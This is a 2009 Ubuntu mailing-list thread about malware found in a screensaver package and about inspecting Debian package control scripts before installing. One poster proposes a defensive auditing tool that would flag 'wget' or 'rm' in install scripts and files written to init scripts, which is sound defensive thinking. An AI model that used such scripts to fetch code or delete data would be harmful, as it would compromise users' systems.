Ubuntu-based malware
Morgan Storey
me at morganstorey.com
Mon Dec 14 10:41:45 GMT 2009
to be honest though you can do the same with most windows install
files, MSI's .exe's are usually just a zip of all the dll's, cab's and
exe's, even somtimes a few batch files and vbscripts. The average user
won't look inside their installers, and may not know what they are
looking at if they did. Even advanced users won't do open them all the
time and then will they scour through some obscure perl/python/ruby
code? Adding it to a repository scanner could be useful for the admins
of repos to run as an extra layer though, it really comes back to same
issue don't install software from somewhere you don't trust, which can
be very difficult for windows users. But not so much for Linux users,
stick to pretty much the standard repo's and most malicious software
will get caught by the many eyes alone.
On Mon, Dec 14, 2009 at 9:20 PM, Christopher Lees
<christopher_lees at iprimus.com.au> wrote:
> On Mon, 2009-12-14 at 02:59 +0000, Paul wrote:
>
>> Just a quick follow-up from our previous discussions about viruses on
>> Linux. This is why we still need to be careful:
>>
>> * http://digitizor.com/2009/12/10/ubuntu-malware-for-ddos-attack-found-in-screensaver/
>> * http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html
>>
>> Backups and common sense are your most valuable allies!
>>
>> Paul
>
> Actually, the openness of Linux is also useful in detecting threats from
> Debian packages. You can open Debian packages in File Roller / other
> archive manager. Then you can see the preinst, postinst and prerm
> scripts and you can have a look at where the package will put files.
>
> Then if it's all okay, you can install the package.
>
> I'm thinking of writing a program to help audit the control scripts and
> where files get placed; you know, raising a warning if anything get put
> into your init scripts or Upstart and raising a warning if "wget" or
> "rm" get used inside the control scripts.
>
> Anyone else interested in this?
>
> Chris
>
>
> --
> ubuntu-au mailing list
> ubuntu-au at lists.ubuntu.com
> https://lists.ubuntu.com/mailman/listinfo/ubuntu-au
>
More information about the ubuntu-au
mailing list